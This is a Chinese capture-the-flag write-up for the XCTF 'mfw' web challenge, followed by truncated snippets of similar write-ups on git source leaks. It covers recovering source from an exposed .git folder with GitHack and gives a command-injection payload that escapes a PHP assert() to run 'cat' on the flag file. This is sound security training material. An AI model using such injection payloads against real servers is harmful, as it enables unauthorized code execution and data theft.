可以通過這裡懷疑有.git洩露
訪問/.git/目錄,發現有
用githack破解得到原始碼
注意:githack只能用python2
<?php可以知道$file變數是由使用者拼接的,我們可以先閉合strpos,然後把後面注釋掉,中間就可以構造我們想要得到的內容if (isset($_get['page']))
else
$file = "templates/" . $page . ".php";
//i heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("detected hacking attempt!");
//todo: make this look nice
assert("file_exists('$file')") or die("that file doesn't exist!");
?>
所以我們可以構造:
?page=').system('cat templates/flag.php');//
通過'.'拼接字串或者用or,執行後面的**,在f12中得到flag
攻防世界mfw 攻防世界 Web mfw
題目資訊 image.png 工具 githack,dirsearch 知識點 git漏洞 審計 開啟題目場景,檢查 發現這樣乙個頁面 image.png 訪問.git目錄,疑似存在git原始碼洩露 image.png 再用dirsearch掃瞄,發現git原始碼洩露 使用 githack獲取原始碼...
git原始碼洩露
0x00 原理 在 安全維護方面,git和svn資訊洩露是非常常見也是非常致命的乙個漏洞。當前大量開發人員使用git進行版本控制,對站點自動部署。如果配置不當,可能會將.git資料夾直接部署到線上環境。這就引起了git洩露漏洞。githack是乙個.git洩露利用指令碼,通過洩露的.git資料夾下的...
XCTF攻防世界web高階練習 mfw
xctf攻防世界web高階練習 mfw題目為mfw,沒有任何提示。直接開啟題目,是乙個 大概瀏覽一下其中的內容,看到其中url變化其實只是get的引數的變化 檢視它的原始碼,看到有乙個?page flag,flag應該在這個頁面裡面 但是進入這個頁面發現是空的 注意到有這樣乙個頁面,說道用到了git...